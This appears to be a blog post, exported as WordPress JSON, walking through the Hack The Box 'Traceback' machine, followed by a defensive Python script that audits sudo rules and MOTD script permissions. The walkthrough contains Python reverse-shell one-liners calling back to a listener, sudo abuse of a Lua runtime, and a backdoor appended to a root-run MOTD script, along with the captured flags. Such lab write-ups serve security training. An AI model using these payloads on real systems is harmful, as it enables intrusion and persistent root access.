{"id":1550,"date":"2021-09-12T12:29:03","date_gmt":"2021-09-12T12:29:03","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1550"},"modified":"2021-09-12T12:29:12","modified_gmt":"2021-09-12T12:29:12","slug":"traceback","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/12\/traceback\/","title":{"rendered":"Traceback"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Difficulty<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/233\" title=\"Traceback\">Traceback<\/a> - HTB<\/td>\n<td>Easy<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/c1a1199f831c50fdb1895737b009278b.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap scan:<\/p>\n<pre><code class=\"language-sh\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)\n|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)\n|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Help us\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>Only SSH and Apache are exposed. I browsed to the HTTP service and found nothing with gobuster, but the page source contained the following comment:<\/p>\n<pre><code class=\"language-html\">...\n&lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;center&gt;\n&lt;h1&gt;This site has been owned&lt;\/h1&gt;\n&lt;h2&gt;I have left a backdoor for all the net. 
FREE INTERNETZZZ&lt;\/h2&gt;\n&lt;h3&gt; - Xh4H - &lt;\/h3&gt;\n&lt;!--Some of the best web shells that you might need ;)--&gt;\n&lt;\/center&gt;\n&lt;\/body&gt;\n...<\/code><\/pre>\n<p>The comment hints that a web shell was left on the server, so I looked for lists of common web shell file names and ran gobuster again with the wordlist from <a href=\"https:\/\/gist.githubusercontent.com\/sbnsec\/352128ea5bd8c95f48d748d5f25e3639\/raw\/a2aeda5d66c4776da4cc5d0736021d7fe54a5332\/webshell-list.txt\">https:\/\/gist.githubusercontent.com\/sbnsec\/352128ea5bd8c95f48d748d5f25e3639\/raw\/a2aeda5d66c4776da4cc5d0736021d7fe54a5332\/webshell-list.txt<\/a>.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/Traceback]\n\u2514\u2500# gobuster dir --url http:\/\/10.10.10.181  --add-slash --expanded --follow-redirect --no-error --wordlist webshell-list.txt -t 50| tee gobuster2 \n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.181\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                webshell-list.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/09\/10 13:05:25 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.181\/smevk.php\/           (Status: 200) [Size: 1261]\n\n===============================================================\n2021\/09\/10 13:05:28 Finished\n===============================================================<\/code><\/pre>\n<p>That found a web shell at <code>\/smevk.php<\/code>, and I logged into it with <code>admin:admin<\/code>.<\/p>\n<p>From the web shell I spawned a reverse shell back to my listener on 10.10.14.18:1111 with the following payload:<\/p>\n<pre><code class=\"language-sh\">python3 -c &#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.18&quot;,1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code><\/pre>\n<p>Enumerating the box as webadmin (the user the web shell runs as) showed two things: sudo lets me run one binary as the sysadmin user without a password, and there is a note from sysadmin in webadmin's home directory.<\/p>\n<pre><code>\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Files inside \/home\/webadmin (limit 20)\ntotal 44\ndrwxr-x--- 5 webadmin sysadmin 4096 Apr 22 06:08 .\ndrwxr-xr-x 4 root     root     4096 Aug 25  2019 ..\n-rw------- 1 webadmin webadmin  105 Mar 16  2020 .bash_history\n-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout\n-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc\ndrwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache\ndrwxrwxr-x 3 webadmin webadmin 4096 Apr 22 06:08 .local\n-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history\n-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile\ndrwxrwxr-x 2 webadmin webadmin 4096 Feb 27  2020 .ssh\n-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16  2020 note.txt<\/code><\/pre>\n<pre><code>\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Checking &#039;sudo -l&#039;, \/etc\/sudoers, and \/etc\/sudoers.d\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#sudo-and-suid\nMatching Defaults entries for webadmin on traceback:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser webadmin may run the following commands on traceback:\n    (sysadmin) NOPASSWD: \/home\/sysadmin\/luvit<\/code><\/pre>\n<pre><code 
class=\"language-sh\">webadmin@traceback:\/home\/webadmin$ cat note.txt\ncat note.txt\n- sysadmin -\nI have left a tool to practice Lua.\nI&#039;m sure you know where to find it.\nContact me if you have any question.<\/code><\/pre>\n<p>luvit is a Lua runtime, and the sudo rule lets webadmin run it as sysadmin with no password, so whatever Lua file I hand it executes as sysadmin. A one-line script calling <code>os.execute(&#039;\/bin\/sh&#039;)<\/code> is enough to get a shell; I saved it to \/tmp and ran it through sudo:<\/p>\n<pre><code class=\"language-sh\">webadmin@traceback:\/tmp$ echo &quot;os.execute(&#039;\/bin\/sh&#039;)&quot; &gt; lua_reverse.lua\necho &quot;os.execute(&#039;\/bin\/sh&#039;)&quot; &gt; lua_reverse.lua\nwebadmin@traceback:\/tmp$ sudo -u sysadmin \/home\/sysadmin\/luvit -i \/tmp\/lua_reverse.lua\n&lt;sadmin \/home\/sysadmin\/luvit -i \/tmp\/lua_reverse.lua\n$ id\nid\nuid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)\n$ \n<\/code><\/pre>\n<p>Nice! Let's read the first flag.<\/p>\n<pre><code class=\"language-sh\">sysadmin@traceback:~$ ls\nls\ntotal 4336\ndrwxr-x--- 5 sysadmin sysadmin    4096 Mar 16  2020 .\ndrwxr-xr-x 4 root     root        4096 Aug 25  2019 ..\n-rw------- 1 sysadmin sysadmin       1 Aug 25  2019 .bash_history\n-rw-r--r-- 1 sysadmin sysadmin     220 Apr  4  2018 .bash_logout\n-rw-r--r-- 1 sysadmin sysadmin    3771 Apr  4  2018 .bashrc\ndrwx------ 2 sysadmin sysadmin    4096 Aug 25  2019 .cache\ndrwxrwxr-x 3 sysadmin sysadmin    4096 Aug 24  2019 .local\n-rw-r--r-- 1 sysadmin sysadmin     807 Apr  4  2018 .profile\ndrwxr-xr-x 2 root     root        4096 Apr 20 08:40 .ssh\n-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24  2019 luvit\n-rw------- 1 sysadmin sysadmin      33 Sep 11 15:34 user.txt\nsysadmin@traceback:~$ cat user.txt\ncat user.txt\n1876d7894f884e005f1d703b3dd63221<\/code><\/pre>\n<p>Continuing enumeration as sysadmin, linpeas reported that the sysadmin group can write to the scripts under <code>\/etc\/update-motd.d\/<\/code>.<\/p>\n<pre><code>\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Interesting GROUP writable 
files (not in Home) (max 500)\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#writable-files\n  Group sysadmin:\n\/etc\/update-motd.d\/50-motd-news\n\/etc\/update-motd.d\/10-help-text\n\/etc\/update-motd.d\/91-release-upgrade\n\/etc\/update-motd.d\/00-header\n\/etc\/update-motd.d\/80-esm\n\/home\/webadmin\/note.txt\n\/tmp\/linpeas.sh\n\/tmp\/result<\/code><\/pre>\n<p>Every SSH login to the box prints a banner, and it comes from <code>00-header<\/code> in this directory: pam_motd runs the scripts in <code>\/etc\/update-motd.d\/<\/code> at login, and watching the host with pspy had already shown me that they execute as root. So I appended a reverse shell to <code>00-header<\/code>, started a listener on port 9999 and logged in over SSH again:<\/p>\n<pre><code class=\"language-sh\">sysadmin@traceback:\/tmp$ echo &quot;python3 -c &#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\&quot;10.10.14.18\\&quot;,9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\\&quot;\/bin\/bash\\&quot;)&#039;&quot; &gt;&gt; \/etc\/update-motd.d\/00-header<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop\/HTB]\n\u2514\u2500# ssh sysadmin@10.10.10.181 -i \/root\/.ssh\/id_rsa                                                           130 \u2a2f\n#################################\n-------- OWNED BY XH4H  ---------\n- I guess stuff could have been configured better ^^ -\n#################################<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nc -lvp 9999                                                                                               1 \u2a2f\nlistening on [any] 9999 ...\n10.10.10.181: inverse host lookup failed: Unknown host\nconnect to [10.10.14.18] from (UNKNOWN) [10.10.10.181] 49408\nroot@traceback:\/# id\nid\nuid=0(root) gid=0(root) groups=0(root)\nroot@traceback:\/# cd \/root\ncd \/root\nroot@traceback:\/root# 
ls\nls\nroot.txt\nroot@traceback:\/root# cat root.txt\ncat root.txt\nbc51332d9d90cd8f554799e7534fc2f3\nroot@traceback:\/root# <\/code><\/pre>\n<p>Easy machine! The whole chain was a leftover web shell, a NOPASSWD sudo rule on a Lua interpreter sitting in a user's home directory, and group-writable MOTD scripts that root runs on every login.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Difficulty OS Logo Traceback &#8211; HTB Easy Linux Walkthrough nmap scan: PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/12\/traceback\/\">Read more<span class=\"screen-reader-text\">Traceback<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1550","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1550","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1550"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1550\/revisions"}],"predecessor-version":[{"id":1552,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1550\/revisions\/1552"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1550"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1550"},{"taxonomy":"post_tag","embeddable":true,"href":"h
ttps:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1550"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
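The two privilege-escalation findings in the walkthrough (a NOPASSWD sudo rule whose target binary lives in a user's home directory, and group-writable scripts in /etc/update-motd.d that pam_motd runs as root on every login) are exactly the checks a pentester or a defender automates. The following Python script is an added example written for this page, not code from the original post, from linpeas or from the HTB machine: it parses `sudo -l` output and flags rules whose command is not a root-owned system binary, and it lists MOTD scripts a non-root user could modify. The constructed sample reuses the post's sudo output plus an invented, benign `apt-get` rule; `SYSTEM_PREFIXES` is a heuristic chosen here, and `demo_motd_dir` builds a throwaway directory so the audit can be exercised offline.

```python
"""Local privesc audit for the two Traceback misconfigurations.
Added example for this write-up; not code from the original post."""
import os
import re
import stat
import sys
import tempfile

# Constructed sample: the `sudo -l` lines from the post plus an invented
# apt-get rule that should NOT be flagged (root-owned binary under /usr).
SAMPLE_SUDO_L = """\
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) /usr/bin/apt-get
"""

# One sudo rule line: "(runas) TAG: TAG: command [args]"
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

# Heuristic (assumption): where a root-owned binary is expected to live.
SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/snap/")


def parse_sudo_rules(text):
    """Parse `sudo -l` output into {runas, nopasswd, cmd} dicts."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE.match(line)
        if m:
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD:" in m.group("tags").upper(),
                "cmd": m.group("cmd").strip(),
            })
    return rules


def default_owner_uid(path):
    """Owner uid of path on this host, or None if it does not exist."""
    return os.stat(path).st_uid if os.path.exists(path) else None


def risky_sudo_rules(rules, owner_uid=default_owner_uid):
    """Return (rule, reason) pairs for rules whose target is not a root-owned
    system binary: whoever controls that file controls what sudo executes,
    which is the luvit situation. owner_uid is injectable for offline tests."""
    findings = []
    for rule in rules:
        if rule["cmd"] == "ALL":
            findings.append((rule, "unrestricted command"))
            continue
        binary = rule["cmd"].split()[0]
        if not binary.startswith(SYSTEM_PREFIXES):
            findings.append((rule, "binary outside system paths: " + binary))
            continue
        uid = owner_uid(binary)
        if uid not in (None, 0):
            findings.append((rule, "binary not owned by root (uid %d)" % uid))
    return findings


def writable_by_non_root(path, require_root_owner=True):
    """True if path is group- or world-writable, or (optionally) not root-owned."""
    st = os.stat(path)
    if require_root_owner and st.st_uid != 0:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_motd_dir(directory="/etc/update-motd.d", require_root_owner=True):
    """Scripts in directory (executed as root by pam_motd at login) that a
    non-root user could modify. A missing directory yields an empty list."""
    if not os.path.isdir(directory):
        return []
    return sorted(os.path.join(directory, n) for n in os.listdir(directory)
                  if writable_by_non_root(os.path.join(directory, n), require_root_owner))


def demo_motd_dir():
    """Constructed sample (assumption): a temp dir imitating /etc/update-motd.d
    with one 0755 script and one group-writable 0775 script.
    Returns (directory, path of the group-writable script)."""
    directory = tempfile.mkdtemp(prefix="motd-demo-")
    for name, mode in (("00-header", 0o755), ("10-help-text", 0o775)):
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return directory, os.path.join(directory, "10-help-text")


if __name__ == "__main__":
    # Usage on a target: sudo -l 2>/dev/null | python3 audit.py
    text = SAMPLE_SUDO_L if sys.stdin.isatty() else sys.stdin.read()
    for rule, reason in risky_sudo_rules(parse_sudo_rules(text)):
        tag = "NOPASSWD" if rule["nopasswd"] else "password"
        print("sudo  (%s, %s) %s: %s" % (rule["runas"], tag, rule["cmd"], reason))
    for path in audit_motd_dir():
        print("motd  %s is modifiable by a non-root user" % path)
```

Run it as the low-privileged user with the real `sudo -l` output on stdin; on Traceback it reports the luvit rule and the five group-writable update-motd.d scripts. The fix for both is the same one the banner jokes about: sudo targets belong in root-owned system paths, and anything pam_motd executes must be writable only by root.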